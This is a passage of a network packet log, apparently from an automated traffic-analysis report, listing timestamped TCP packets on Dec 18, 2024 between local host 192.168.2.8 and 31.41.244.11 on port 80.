                                                                                                                                                                                          Dec 18, 2024 09:07:23.626918077 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.626931906 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.626985073 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.627028942 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.627060890 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.627113104 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.627129078 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.627140999 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.627181053 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.628094912 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.628108025 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.628118992 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.628158092 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.628864050 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.628875017 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.628886938 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.629010916 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.629698038 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.629851103 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.629861116 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.629903078 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.630590916 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.630623102 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.630635977 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.630697966 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.631494045 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.631658077 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.631669044 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.631714106 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.632282019 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.632349014 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.632380009 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.632391930 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.632426023 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.632450104 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.633158922 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.633210897 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.633223057 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.633232117 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.633249998 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.633275986 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.634099960 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.634110928 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.634123087 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.634167910 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.634457111 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.634919882 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.634965897 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.634977102 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.635015965 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.635792017 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.635843992 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.635858059 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.635869980 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.635920048 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.636610985 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.636688948 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.636699915 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.636744022 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.637471914 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.637521982 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.637550116 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.637562037 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.637592077 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.637626886 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.638400078 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.638487101 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.638499022 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.638511896 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.638564110 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.639264107 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.639358044 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.639368057 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.639415026 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.640119076 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.640165091 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.640176058 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.640189886 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.640218973 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.640985012 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.641037941 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.641057014 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.641071081 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.641104937 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.641129971 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.641889095 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.641956091 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.641967058 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.642003059 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.642035007 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.642759085 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.642806053 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.642838001 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.642880917 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.643627882 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.643667936 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.643680096 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.643724918 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.644478083 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.644526958 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.644741058 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.644807100 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.644818068 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.644864082 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.645682096 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.645693064 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.645704031 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.645734072 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.645781040 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.646470070 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.646536112 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.646545887 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.646591902 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.647358894 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.647409916 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.647439957 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.647450924 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.647511005 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.648238897 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.648289919 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.648319960 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.648332119 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.648366928 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.649146080 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.649168015 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.649178982 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.649194956 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.649230003 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.649951935 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.650002003 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.650170088 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.650182962 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.650217056 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.650238991 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.650835037 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.650882006 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.650954008 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.650965929 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.650998116 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.651709080 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.651751995 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.651761055 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.651762962 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.651796103 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.651808023 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.652580023 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.652628899 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.652662992 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.652677059 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.652709961 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.652729988 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.653490067 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.653561115 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.653572083 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.653584003 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.653609037 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.653630972 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.654295921 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.654344082 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.654496908 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.654509068 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.654541016 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.654557943 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.655184984 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.655235052 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.655280113 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.655291080 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.655324936 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.655348063 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.656091928 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.656153917 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.656163931 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.656207085 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.656253099 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.656835079 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.658488035 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.818152905 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.818195105 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.818206072 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.818267107 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.818453074 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.818542004 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.818552971 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.818595886 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.818631887 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.819341898 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.819379091 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.819389105 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.819439888 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.820192099 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.820285082 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.820296049 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.820344925 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.821080923 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.821142912 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.821154118 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.821202040 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.821911097 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.822000980 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.822010994 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.822062016 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.822907925 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.822917938 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.822932005 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.822993040 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.823033094 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.823739052 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.823750019 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.823760033 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.823818922 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.824786901 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.824798107 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.824803114 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.824882030 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.825588942 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.825664043 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.825700045 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.825742006 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.825788021 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.826422930 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.826433897 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.826446056 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.826499939 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.827147961 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.827220917 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.827270985 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.827282906 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.827352047 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.828052044 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.828073978 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.828083992 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.828145981 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.829025030 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.829036951 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.829047918 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.829097033 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.829132080 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.830105066 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.830156088 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.830168009 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.830224991 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.830804110 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.830813885 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.830823898 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.830871105 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.830913067 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.831883907 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.831932068 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.831969976 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.831970930 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.832366943 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.832396984 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.832437992 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.832468987 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.832504988 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.832565069 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.833326101 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.833359957 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.833395958 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.833442926 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.833492041 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.834196091 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.834249020 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.834284067 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.834332943 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.834381104 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.835165024 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.835199118 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.835233927 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.835262060 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.835450888 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.835933924 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.836052895 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.836086988 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.836117983 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.836155891 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.836875916 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.837115049 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.837147951 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.837198019 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.837199926 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.837261915 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.838244915 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.838360071 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.838396072 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.838432074 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.838475943 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.838779926 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.838845968 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.838865042 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.838880062 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.839003086 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.839003086 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.839647055 CET804971431.41.244.11192.168.2.8
